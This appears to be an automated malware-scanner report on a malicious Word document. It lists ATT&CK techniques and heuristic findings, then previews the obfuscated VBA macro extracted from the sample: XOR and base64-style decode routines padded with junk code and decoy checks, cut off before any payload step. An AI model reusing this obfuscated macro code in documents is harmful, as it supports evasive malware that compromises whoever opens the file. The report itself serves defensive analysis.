MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1047 WMI
The sample is a malicious Office document containing a VBA macro. The AutoClose macro is configured to execute when the document is closed, and it utilizes CreateObject, indicating an intent to run arbitrary code. This macro is likely designed to download and execute a second-stage payload, a common technique for initial compromise.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 84866 bytes |
SHA-256: 6a0417aab020bfe96c4dc5488e96d09c96b654e6e0dbb05f0214ab1e4e234b02 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "K6Rd0c"
Public Function Zv9gHIn(ByRef LOtowdOn As String, ByVal Ba1ryOA As String) As String
Dim nCpp5tPyRY() As Byte
Dim xUg26cV() As Byte
Dim Ckxz1pzTqI As Long
Dim MTh9ek2S, X50Db3kKP As Integer
MTh9ek2S = 5 + 8
For sKq83lH1 = 0 To 9
X50Db3kKP = X50Db3kKP + sKq83lH1
Next sKq83lH1
If X50Db3kKP < sKq83lH1 Then
Dim SDxqMow7 As Long
End If
If Application.UserName = "JYVtK1IcjkI" Then
MsgBox ("IOOGqaCUMPS")
Else
Dim DpZyY06As2UemJ As String
DpZyY06As2UemJ = Application.UserName
End If
Dim PQvjP4d As Long
Dim TtREiA As Long
For p7UOT4 = 8 To 13
TtREiA = TtREiA + p7UOT4
Next p7UOT4
If Len(Application.UserName) < 577 Then
Dim e94LaST As Collection
End If
Dim KPNAz9Iajq8 As Long
Dim EmGHO7Uska As Long
If Len(Application.UserName) < 631 Then
Dim deU7SUg8E1 As Collection
End If
nCpp5tPyRY = StrConv(LOtowdOn, vbFromUnicode)
Ckxz1pzTqI = UBound(nCpp5tPyRY)
Dim WkBWzIHHT0 As String
For eqSiXuy4 = 0 To 8
WkBWzIHHT0 = WkBWzIHHT0 + "h"
Next eqSiXuy4
Dim iYnKNBOp, k3V7vY As Integer
iYnKNBOp = 5 + 8
For swpwpg3Qr = 0 To 8
k3V7vY = k3V7vY + swpwpg3Qr
Next swpwpg3Qr
If k3V7vY < swpwpg3Qr Then
Dim LqPRqXDbN As Long
End If
For Elc6b5j4 = 0 To 5
KorHlBvB1 = KorHlBvB1 + Elc6b5j4
Next Elc6b5j4
If Application.UserName = "h0GpnSuYOIk" Then
MsgBox ("Fm1CzzNrug5")
Else
Dim lb0b6IWkd1RS7h As String
lb0b6IWkd1RS7h = Application.UserName
End If
xUg26cV = StrConv(Ba1ryOA, vbFromUnicode)
Dim DUzVvkdN As String
For CbWUrQfm8e = 0 To 8
DUzVvkdN = DUzVvkdN + "D"
Next CbWUrQfm8e
Dim ZgdTDgrTdn, asfveoPz As Integer
ZgdTDgrTdn = 6 + 6
For P9W6vrmD = 0 To 8
asfveoPz = asfveoPz + P9W6vrmD
Next P9W6vrmD
If asfveoPz < P9W6vrmD Then
Dim SejXH7 As Long
End If
PQvjP4d = UBound(xUg26cV)
Dim DAsx3txkU6 As Long
For QA50NsSeR4 = 6 To 13
DAsx3txkU6 = DAsx3txkU6 + QA50NsSeR4
Next QA50NsSeR4
If Len(Application.UserName) < 496 Then
Dim DU3TzoOLx As Collection
End If
If Application.UserName = "Pu1o1e0TeZn" Then
MsgBox ("yrH6ytfMotb")
Else
Dim RZAZj3xKs9LPiy As String
RZAZj3xKs9LPiy = Application.UserName
End If
For KPNAz9Iajq8 = 0 To Ckxz1pzTqI
If Application.UserName = "DMYlmfLymNq" Then
MsgBox ("DDiHBaI0w3T")
Else
Dim eZMi2r9Nqzx2Sx As String
eZMi2r9Nqzx2Sx = Application.UserName
End If
nCpp5tPyRY(KPNAz9Iajq8) = nCpp5tPyRY(KPNAz9Iajq8) Xor xUg26cV(EmGHO7Uska)
Dim VOVEXoM As Long
For kKZwvAJt29 = 7 To 15
VOVEXoM = VOVEXoM + kKZwvAJt29
Next kKZwvAJt29
If EmGHO7Uska < PQvjP4d Then
For dL11qujk8 = 0 To 8
vP6xWLVe6 = vP6xWLVe6 + dL11qujk8
Next dL11qujk8
EmGHO7Uska = EmGHO7Uska + 1
Else
If Application.UserName = "wya6IshdhE0" Then
MsgBox ("ffZzab0V5QC")
Else
Dim S0nMHb2zilm2LV As String
S0nMHb2zilm2LV = Application.UserName
End If
EmGHO7Uska = 0
End If
Dim gcQtGvLxR As Long
For SENkiV = 9 To 16
gcQtGvLxR = gcQtGvLxR + SENkiV
Next SENkiV
If Len(Application.UserName) < 533 Then
Dim BdryWL2a As Collection
End If
Next KPNAz9Iajq8
If Application.UserName = "v1KsJp49ppy" Then
MsgBox ("iDYzJ3F292b")
Else
Dim uDeXEVjiFU57rU As String
uDeXEVjiFU57rU = Application.UserName
End If
If Application.UserName = "E5Dn8DzNhqn" Then
MsgBox ("X6o3dohc3MB")
Else
Dim UvL0sHj5PSEcoi As String
UvL0sHj5PSEcoi = Application.UserName
End If
Zv9gHIn = StrConv(nCpp5tPyRY, vbUnicode)
For r6q0b3f = 0 To 5
eJuXsP = eJuXsP + r6q0b3f
Next r6q0b3f
Dim RfLnjZG As String
For jpEame2Z = 0 To 8
RfLnjZG = RfLnjZG + "A"
Next jpEame2Z
End Function
Public Function EqEXXq(ByVal THREE As String) As Byte()
Dim VZtk5URQz6 As Integer, XvDvl0c7PY As Integer, SAgFI45dh(0 To 63) As Byte, RulVA7FK(0 To 127) As Byte
If Application.UserName = "BIcOdsdrqiB" Then
MsgBox ("t0kNp7servP")
Else
Dim ULfm6J6e3koCME As String
ULfm6J6e3koCME = Application.UserName
End If
If Application.UserName
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.